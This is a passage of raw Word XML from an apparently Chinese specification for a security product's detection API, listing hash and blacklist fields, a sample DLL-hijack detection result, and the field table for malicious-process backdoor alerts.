          <w:p w14:paraId="62D29BFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B6BC22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315C36EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28F51C20" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="440C6EF4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C0956E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D5730E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14FC2A72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="130E9691" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E44C0C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA390BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F4A0B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC56DB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DFD25C3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B2FC0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A7BCA6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A117351" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A81BB59" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="593DC0E9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="239EA147" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="179DE8F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FFE890C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02DC51E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="53106A45" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="311E8FE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C825E10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="305F75EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="593B4D46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74EBA16A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37C9ABDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ED30C1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11846B50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20158713" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09175B46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E9C6495" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20CB7263" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37EFF3AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B63A757" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6015356A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF0B0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hijack_image_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "extension": ".dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_directory": "c:\\dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_path": "c:\\dll\\dlltest.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_base_str": "0x26150000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_reason": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_name": "dlltest.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_md5": "a3c033d7f7229e962dc25836f94868b1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "attributes": 32,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_time": 1527222087,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_size": 80896,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_pe": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ret_code": "0x00010000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "process_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_name": "Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_id": 1828,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "create_time": 1527222087,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_wow64": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "process_id": 1788,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_64bit": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "image_file_name": "E:\\TEst\\bin\\Win32Project2.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent_process_name": "explorer.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "hijacked_image_info": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "extension": ".dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_directory": "e:\\test\\bin",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_base_str": "0x28850000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_reason": 4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_name": "dlltest.dll",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "module_type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "attributes": 32,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "load_time": 1527222087,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "file_size": 80896,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "b_pe": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "f_size"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_user"="",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_type"="32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_ctime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_mtime"=100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "f_atime"=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black_id" = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E481956" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="后门类型恶意进程"/>
      <w:bookmarkEnd w:id="255"/>
      <w:bookmarkEnd w:id="256"/>
      <w:r>
        <w:t>后门类型：恶意进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F00DEBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ruleResults 结构信息</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1745"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="462E09A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F6E0B72" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BB9E7E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1601B048" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D47234" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5A079061" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F347666" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>virusName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AAF0C22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38714F8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E053D24" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>病毒名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E248A58" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F3AAE48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>virusDescription</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="393CE037" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F7272B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14A80DC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7CF066AC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ADC14A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>libUpdateTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58113DD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287DF530" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0333FFFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>更新时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55FE0019" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D9FC58E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>libName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="656AA6BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="478B6572" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49BF9683" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>检测库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EFCCA63" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C569720" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>virusInstruct</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F06A82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5232ECCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06B3136C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>修复方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62ECFBA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>静态信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1387"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3DAF5C7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87E03CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55642DFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F44C89A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
